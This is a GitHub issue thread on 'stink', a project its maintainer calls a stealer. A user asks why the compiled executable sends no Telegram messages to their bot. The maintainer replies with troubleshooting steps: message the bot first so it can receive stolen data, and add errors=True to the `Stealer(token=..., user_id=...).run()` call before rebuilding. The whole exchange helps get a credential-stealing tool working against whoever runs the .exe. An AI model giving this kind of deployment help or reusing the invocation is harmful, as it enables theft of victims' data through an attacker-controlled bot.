### ISSUE TITLE
Exe not working

### ISSUE THREAD

**Issue by anon-web** [FallenAstaroth/stink#29]
I got the .exe file, butt when I run it, I am not receiving any Telegram messages from my bot. How it should be done after getting exe file?

**Comment by FallenAstaroth** [comment]
> I got the .exe file, butt when I run it, I am not receiving any Telegram messages from my bot. How it should be done after getting exe file?

Hello. Here are a few options:

1) First, make sure you send any message to the bot in private messages from your account, which the bot should send data to (this is necessary, since bots can't write first).

2) If the first point is done but the problem persists, add the parameter `errors=True` to the stealer call code (example `Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, errors=True).run()`). Then convert the exe again, with the console enabled. After conversion run the exe file through the command line and send the error here.
